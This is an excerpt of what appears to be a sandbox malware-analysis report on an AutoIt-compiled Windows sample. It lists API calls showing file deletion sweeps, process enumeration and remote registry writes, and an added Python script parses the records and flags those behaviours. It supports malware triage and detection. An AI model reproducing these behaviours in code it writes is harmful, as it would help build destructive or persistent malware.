                                                • FindClose.KERNEL32(00000000), ref: 003EA03B
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 003EA057
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003EA0A7
                                                • SetCurrentDirectoryW.KERNEL32(00437B94), ref: 003EA0C5
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003EA0CF
                                                • FindClose.KERNEL32(00000000), ref: 003EA0DC
                                                • FindClose.KERNEL32(00000000), ref: 003EA0EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1409584000-438819550
                                                • Opcode ID: 9e8c01f44f5be928e42b122b9d37ba1450c56430d798114cc5cdf3204b335098
                                                • Instruction ID: faccdfe356da8ec2813ed41d08231ada5a00ba9f86bdda5c7d8606e0d6e7c711
                                                • Opcode Fuzzy Hash: 9e8c01f44f5be928e42b122b9d37ba1450c56430d798114cc5cdf3204b335098
                                                • Instruction Fuzzy Hash: B9310831A006696BDF129FF5DC49ADE77ACAF05320F1142A6E805E30D1DB34EE88CB15

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0037557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00375558,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0037559E
                                                  • Part of subcall function 003DE9C5: GetFileAttributesW.KERNELBASE(?,003DD755), ref: 003DE9C6
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 003DD8E2
                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 003DD99D
                                                • MoveFileW.KERNEL32(?,?), ref: 003DD9B0
                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 003DD9CD
                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 003DD9F7
                                                  • Part of subcall function 003DDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,003DD9DC,?,?), ref: 003DDA72
                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 003DDA13
                                                • FindClose.KERNEL32(00000000), ref: 003DDA24
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 1946585618-1173974218
                                                • Opcode ID: 4c2769b76b18dfe48e4c58589312d7dd203fa8e755a8e6a5ca9afa2c1031730a
                                                • Instruction ID: 42a0e5c33be1dba7967ba266fc11a6b369e1bc12325009a131da8fa10146b4c5
                                                • Opcode Fuzzy Hash: 4c2769b76b18dfe48e4c58589312d7dd203fa8e755a8e6a5ca9afa2c1031730a
                                                • Instruction Fuzzy Hash: 36614032C0114D9BCF16EFE0DA52AEDBB75AF15300F2480AAE445BB256EB355F09DB50
                                                APIs
                                                  • Part of subcall function 0037557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00375558,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0037559E
                                                  • Part of subcall function 003DE9C5: GetFileAttributesW.KERNELBASE(?,003DD755), ref: 003DE9C6
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 003DDBE0
                                                • DeleteFileW.KERNELBASE(?,?,?,?), ref: 003DDC30
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003DDC41
                                                • FindClose.KERNEL32(00000000), ref: 003DDC58
                                                • FindClose.KERNEL32(00000000), ref: 003DDC61
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 2649000838-1173974218
                                                • Opcode ID: 95b98fb58a74ab62ebc1f8ef6ea1c834f00b88eafc6b27a71178e084d3301d37
                                                • Instruction ID: d3ffec286407d028be59e20e036fb5292f20a165ff22f07b589b378d37fda54f
                                                • Opcode Fuzzy Hash: 95b98fb58a74ab62ebc1f8ef6ea1c834f00b88eafc6b27a71178e084d3301d37
                                                • Instruction Fuzzy Hash: 2031C3320083449BC312EF64D8919AFB7F8BE92304F40895EF4D5972A1DB74DA0DCB56
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 003DDCC1
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 003DDCCF
                                                • Process32NextW.KERNEL32(00000000,?), ref: 003DDCEF
                                                • CloseHandle.KERNELBASE(00000000), ref: 003DDD9C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 420147892-0
                                                • Opcode ID: 5017cbbdc454c035fce27a3a1a383cf10cd096c0be3a865f959ead5c2ad41739
                                                • Instruction ID: af42b25636e957e0cb94644c729b1b535ee2da2fc5e43c3113817ca56ce57815
                                                • Opcode Fuzzy Hash: 5017cbbdc454c035fce27a3a1a383cf10cd096c0be3a865f959ead5c2ad41739
                                                • Instruction Fuzzy Hash: 8031A4725083009FD712EF64DC85BAFBBF8AF99350F04482DF5858B2A1DB719949CB92
                                                APIs
                                                • lstrlenW.KERNEL32(?,003B4686), ref: 003DE397
                                                • GetFileAttributesW.KERNELBASE(?), ref: 003DE3A6
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 003DE3B7
                                                • FindClose.KERNELBASE(00000000), ref: 003DE3C3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                • String ID:
                                                • API String ID: 2695905019-0
                                                • Opcode ID: 52ce6813526158d7145413ce1c5dd369db00ec7747660bc05eee0531d0215efa
                                                • Instruction ID: bb5278af4a3af4f18db0ab75c989e0e2e006718dcc858c143c5abe2637288820
                                                • Opcode Fuzzy Hash: 52ce6813526158d7145413ce1c5dd369db00ec7747660bc05eee0531d0215efa
                                                • Instruction Fuzzy Hash: 1BF0A03281192057C31277B8AD0D8BA7FAC9E41335B104766F835D22F0DBB099994699
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,0039504E,?,004398D8,0000000C,003951A5,?,00000002,00000000), ref: 00395099
                                                • TerminateProcess.KERNEL32(00000000,?,0039504E,?,004398D8,0000000C,003951A5,?,00000002,00000000), ref: 003950A0
                                                • ExitProcess.KERNEL32 ref: 003950B2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 2eaf1af1fb9d29903b6f34ab7f19d45d88bc05ee923532eb18e8172bfa0c3ebb
                                                • Instruction ID: b182786c61c898425c3a424096d52f85866aafd5e6ddd8b8f7336962a204447b
                                                • Opcode Fuzzy Hash: 2eaf1af1fb9d29903b6f34ab7f19d45d88bc05ee923532eb18e8172bfa0c3ebb
                                                • Instruction Fuzzy Hash: 37E0B631800548AFDF236FA4DE0DE593B69EB41381F014028FC459A232DF35DD86CB94
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 003CE60A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID: X64
                                                • API String ID: 2645101109-893830106
                                                • Opcode ID: 7b7d8f9d5f658d3e74c70d13057465e5706560f1aeae46c601377e9269cd3dee
                                                • Instruction ID: f786413c966820c677d21cebd04a8e40617b8098ed5c6d564473258ffee91e16
                                                • Opcode Fuzzy Hash: 7b7d8f9d5f658d3e74c70d13057465e5706560f1aeae46c601377e9269cd3dee
                                                • Instruction Fuzzy Hash: A9D0C9B4C1111DEACB91CB90DC88DDD737CBB04304F1001A5F50AE2000DB34A5488B10

                                                Control-flow Graph
                                                control_flow_graph (function at 0x3fcd16, basic blocks 3fcd16-3fd2f2; node/edge listing omitted, it is the source of the rendered graph. Win32 calls on the graph: RegConnectRegistryW, RegCreateKeyExW, RegSetValueExW, RegCloseKey)
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003FCE1C
                                                • RegCreateKeyExW.KERNELBASE(?,?,00000000,0040DCD0,00000000,?,00000000,?,?), ref: 003FCEA3
                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 003FCF03
                                                • _wcslen.LIBCMT ref: 003FCF53
                                                • _wcslen.LIBCMT ref: 003FCFCE
                                                • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 003FD011
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 003FD120
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 003FD1AC
                                                • RegCloseKey.KERNELBASE(?), ref: 003FD1E0
                                                • RegCloseKey.ADVAPI32(00000000), ref: 003FD1ED
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 003FD2BF
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 9721498-966354055
                                                • Opcode ID: 65b089507ed1d89caf8417fe36ddd1c31b3dee7caf4aae018e46192612d970aa
                                                • Instruction ID: 913a5f23bdabf46887400b9967da073f650714e956a402e8cc0e64d82963e2bb
                                                • Opcode Fuzzy Hash: 65b089507ed1d89caf8417fe36ddd1c31b3dee7caf4aae018e46192612d970aa
                                                • Instruction Fuzzy Hash: 371267352042059FDB26DF14C885A2AB7E6FF88714F15849CF99A9F3A2CB35ED41CB81
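The three records above (the FindFirstFileW/FindNextFileW sweep that deletes or moves entries at 0x3DD8E2, the Toolhelp32 process walk at 0x3DDCC1, and the RegCreateKeyExW/RegSetValueExW write at 0x3FCEA3) are the kind of per-function API list an analyst scans by eye. The following is an added example, not part of the Joe Sandbox report, that parses that `• Api.Module(args), ref: ADDR` format into records and tags each one with behaviour labels. The sample input is constructed by copying a few of the report's own lines (Similarity fields other than the fuzzy hash left out); the signature labels and the W/A-suffix normalisation are my own heuristics, not anything Joe Sandbox does.

```python
"""Added example (not from the Joe Sandbox report): parse per-function API records and flag behaviour patterns."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample input: three records copied in the page's own '• Api.Module(args), ref: ADDR' format.
SAMPLE = """\
APIs
• FindFirstFileW.KERNELBASE(?,?), ref: 003DD8E2
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 003DD99D
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 003DD9F7
  • Part of subcall function 003DDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,003DD9DC,?,?), ref: 003DDA72
• FindClose.KERNEL32(00000000), ref: 003DDA24
• Instruction Fuzzy Hash: 36614032C0114D9BCF16EFE0DA52AEDBB75AF15300F2480AAE445BB256EB355F09DB50
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 003DDCC1
• Process32FirstW.KERNEL32(00000000,?), ref: 003DDCCF
• Process32NextW.KERNEL32(00000000,?), ref: 003DDCEF
• CloseHandle.KERNELBASE(00000000), ref: 003DDD9C
• Instruction Fuzzy Hash: 8031A4725083009FD712EF64DC85BAFBBF8AF99350F04482DF5858B2A1DB719949CB92
APIs
• RegCreateKeyExW.KERNELBASE(?,?,00000000,0040DCD0,00000000,?,00000000,?,?), ref: 003FCEA3
• RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 003FD011
• RegCloseKey.ADVAPI32(00000000), ref: 003FD1ED
• Instruction Fuzzy Hash: 371267352042059FDB26DF14C885A2AB7E6FF88714F15849CF99A9F3A2CB35ED41CB81
"""

# '• Api.Module(args), ref: ADDR', optionally prefixed by 'Part of subcall function ADDR:'.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HASH_RE = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:\s*(\S+)")


def normalize(api: str) -> str:
    """Drop the W/A charset suffix (heuristic: only after a lowercase letter, so
    FindFirstFileW -> FindFirstFile while CloseHandle and Process32First stay intact)."""
    if len(api) > 2 and api[-1] in "WA" and api[-2].islower():
        return api[:-1]
    return api


@dataclass
class Call:
    api: str
    args: str
    ref: str
    subcall: str | None = None  # callee address when reported as 'Part of subcall function'


@dataclass
class FuncRecord:
    calls: list[Call] = field(default_factory=list)
    fuzzy_hash: str = ""

    @property
    def first_ref(self) -> str:  # address of the first directly reported call, used as the key
        direct = [c.ref for c in self.calls if c.subcall is None]
        return direct[0] if direct else ""

    def api_names(self, include_subcalls: bool = True) -> set[str]:
        return {normalize(c.api) for c in self.calls if include_subcalls or c.subcall is None}


def parse_records(text: str) -> list[FuncRecord]:
    records: list[FuncRecord] = []
    current: FuncRecord | None = None
    for line in text.splitlines():
        if line.strip() == "APIs":  # every 'APIs' header opens a new function record
            current = FuncRecord()
            records.append(current)
            continue
        if current is None:
            continue
        if m := CALL_RE.match(line):
            current.calls.append(Call(m["api"], m["args"] or "", m["ref"], m["sub"]))
        elif m := HASH_RE.match(line):
            current.fuzzy_hash = m.group(1)
    return records


# Behaviour signatures (my own labels, not Joe Sandbox's): label, required APIs, any-of APIs.
SIGNATURES = [
    ("file-sweep: enumerate a directory and delete/move/copy entries",
     {"FindFirstFile", "FindNextFile"}, {"DeleteFile", "MoveFile", "CopyFileEx"}),
    ("process-enum: walk the process list via Toolhelp32",
     {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}, set()),
    ("registry-write: create/open a key and set a value",
     {"RegSetValueEx"}, {"RegCreateKeyEx", "RegOpenKeyEx"}),
]


def classify(record: FuncRecord) -> list[str]:
    names = record.api_names()  # subcall APIs count: the caller reaches them too
    return [label for label, required, any_of in SIGNATURES
            if required <= names and (not any_of or any_of & names)]


def triage(text: str) -> dict[str, list[str]]:
    return {r.first_ref: classify(r) for r in parse_records(text)}


if __name__ == "__main__":
    for ref, labels in triage(SAMPLE).items():
        print(ref, labels or ["(no signature matched)"])
```

Subcall APIs are folded into the caller's set on purpose: the report attributes CopyFileExW to subcall 3DDA5C, but it is the sweep at 0x3DD8E2 that decides to call it, so the caller is where the behaviour should be flagged. Paste a whole execution-graph section in place of `SAMPLE` to triage every function at once; the fuzzy hash on each record is what you would feed to a similarity search across other reports.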

                                                Control-flow Graph
                                                control_flow_graph (function at 0x373e15, basic blocks 373e15-3b4706; node/edge listing omitted, it is the source of the rendered graph. No Win32 API calls appear on the graph, only internal subcalls)
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 0-1645009161
                                                • Opcode ID: b7482771c8a80de77edcb9119d1832f22169419f6ab14589f763bf1e32709c71
                                                • Instruction ID: 05226bdc90e6f256d4bc32a744a04a920cabeefd400443f7e9d670c45e999613
                                                • Opcode Fuzzy Hash: b7482771c8a80de77edcb9119d1832f22169419f6ab14589f763bf1e32709c71
                                                • Instruction Fuzzy Hash: A9812771A40205BBDF33AF64DC42FEE7B68AF05700F148026F909AE582EB78DA45D759

                                                Control-flow Graph
                                                control_flow_graph (function at 0x373696, basic blocks 373696-3b3e55; node/edge listing omitted, it is the source of the rendered graph. Win32 calls on the graph: DefWindowProcW, PostQuitMessage, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu, MoveWindow, SetFocus)
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00373690,?,?), ref: 003736FE
                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,00373690,?,?), ref: 0037372A
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0037374D
                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00373690,?,?), ref: 00373758
                                                • CreatePopupMenu.USER32 ref: 0037376C
                                                • PostQuitMessage.USER32(00000000), ref: 0037378D
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: 0$D$0$D$TaskbarCreated
                                                • API String ID: 129472671-859958045
                                                • Opcode ID: 5fa9b2142f971edfb3b96baa76e0b8b11cc47fd90f5926df3d8097efc96c7608
                                                • Instruction ID: 81a71e3f28f0d40ecd6615664bbcfc02a87ee59e14138c50e4bf6ab99de7a088
                                                • Opcode Fuzzy Hash: 5fa9b2142f971edfb3b96baa76e0b8b11cc47fd90f5926df3d8097efc96c7608
                                                • Instruction Fuzzy Hash: 1F414DF5204185B7DB3B1F78CD4ABB93A69E705310F40C139F5098A690CBBD9B00B71A

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 003735DE
                                                • RegisterClassExW.USER32(00000030), ref: 00373608
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00373619
                                                • InitCommonControlsEx.COMCTL32(?), ref: 00373636
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00373646
                                                • LoadIconW.USER32(000000A9), ref: 0037365C
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0037366B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: b48e16fdc0fd591c14f9314a15ac2ed595d5b1dd343d32db6d0bb365f4931e80
                                                • Instruction ID: 7e67eda22af24f70a248c099ca04ede5ff5ae4f2343740a5127d76ba9e05ce19
                                                • Opcode Fuzzy Hash: b48e16fdc0fd591c14f9314a15ac2ed595d5b1dd343d32db6d0bb365f4931e80
                                                • Instruction Fuzzy Hash: 5B21E5B5E01219AFDB00DFE4EE49B9DBBB4FB09704F00412AF515B62A0D7B44545CF99

                                                Control-flow Graph
                                                APIs
                                                  • Part of subcall function 003B073A: CreateFileW.KERNELBASE(00000000,00000000,?,003B0AA4,?,?,00000000,?,003B0AA4,00000000,0000000C), ref: 003B0757
                                                • GetLastError.KERNEL32 ref: 003B0B0F
                                                • __dosmaperr.LIBCMT ref: 003B0B16
                                                • GetFileType.KERNELBASE(00000000), ref: 003B0B22
                                                • GetLastError.KERNEL32 ref: 003B0B2C
                                                • __dosmaperr.LIBCMT ref: 003B0B35
                                                • CloseHandle.KERNEL32(00000000), ref: 003B0B55
                                                • CloseHandle.KERNEL32(?), ref: 003B0C9F
                                                • GetLastError.KERNEL32 ref: 003B0CD1
                                                • __dosmaperr.LIBCMT ref: 003B0CD8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: becaa2a964e86e887994a28efc1d00946080e2508318febcdd1d1f809e421a0c
                                                • Instruction ID: d91149d28f0dc20ac05ab4fb3a241ed726f2a3dec6ac7e2061439999a47f4559
                                                • Opcode Fuzzy Hash: becaa2a964e86e887994a28efc1d00946080e2508318febcdd1d1f809e421a0c
                                                • Instruction Fuzzy Hash: 68A1E632A042148FDF1EEF78D892BAE7BA0AB06328F14015DF911DF2E1DB319956CB55

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0037551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00375539
                                                  • Part of subcall function 003751BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003751E1
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0037534B
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003B4BD7
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003B4C18
                                                • RegCloseKey.ADVAPI32(?), ref: 003B4C5A
                                                • _wcslen.LIBCMT ref: 003B4CC1
                                                • _wcslen.LIBCMT ref: 003B4CD0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 98802146-2727554177
                                                • Opcode ID: e350312eaddc1360d4ec944f084a684657d2d6070e41745032eec956ef7e9a0b
                                                • Instruction ID: 866776efcf8bb1adc99a45c7146c65da2389e687789367653f8918f93ab329a9
                                                • Opcode Fuzzy Hash: e350312eaddc1360d4ec944f084a684657d2d6070e41745032eec956ef7e9a0b
                                                • Instruction Fuzzy Hash: 9771BE75504300AED715EF64DC829ABBBF8FF89B40F40442EF948CB1A1EB709A08CB59

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00373465
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00373474
                                                • LoadIconW.USER32(00000063), ref: 0037348A
                                                • LoadIconW.USER32(000000A4), ref: 0037349C
                                                • LoadIconW.USER32(000000A2), ref: 003734AE
                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003734C6
                                                • RegisterClassExW.USER32(?), ref: 00373517
                                                  • Part of subcall function 003735AB: GetSysColorBrush.USER32(0000000F), ref: 003735DE
                                                  • Part of subcall function 003735AB: RegisterClassExW.USER32(00000030), ref: 00373608
                                                  • Part of subcall function 003735AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00373619
                                                  • Part of subcall function 003735AB: InitCommonControlsEx.COMCTL32(?), ref: 00373636
                                                  • Part of subcall function 003735AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00373646
                                                  • Part of subcall function 003735AB: LoadIconW.USER32(000000A9), ref: 0037365C
                                                  • Part of subcall function 003735AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0037366B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: 07477a95b8ded188edc970c903b2ebca7b27d5eb1fecb328ad6d580452cf9f6f
                                                • Instruction ID: d15bc4156dc9c232db5d1cae76a2f85605a0b2e41a248b960477a54c1b9d9a13
                                                • Opcode Fuzzy Hash: 07477a95b8ded188edc970c903b2ebca7b27d5eb1fecb328ad6d580452cf9f6f
                                                • Instruction Fuzzy Hash: E3213D78D00314ABDB109FA5EE45AA97FB4FB09B50F40403AF904B72A0C3F945858F98
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0037CE8E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
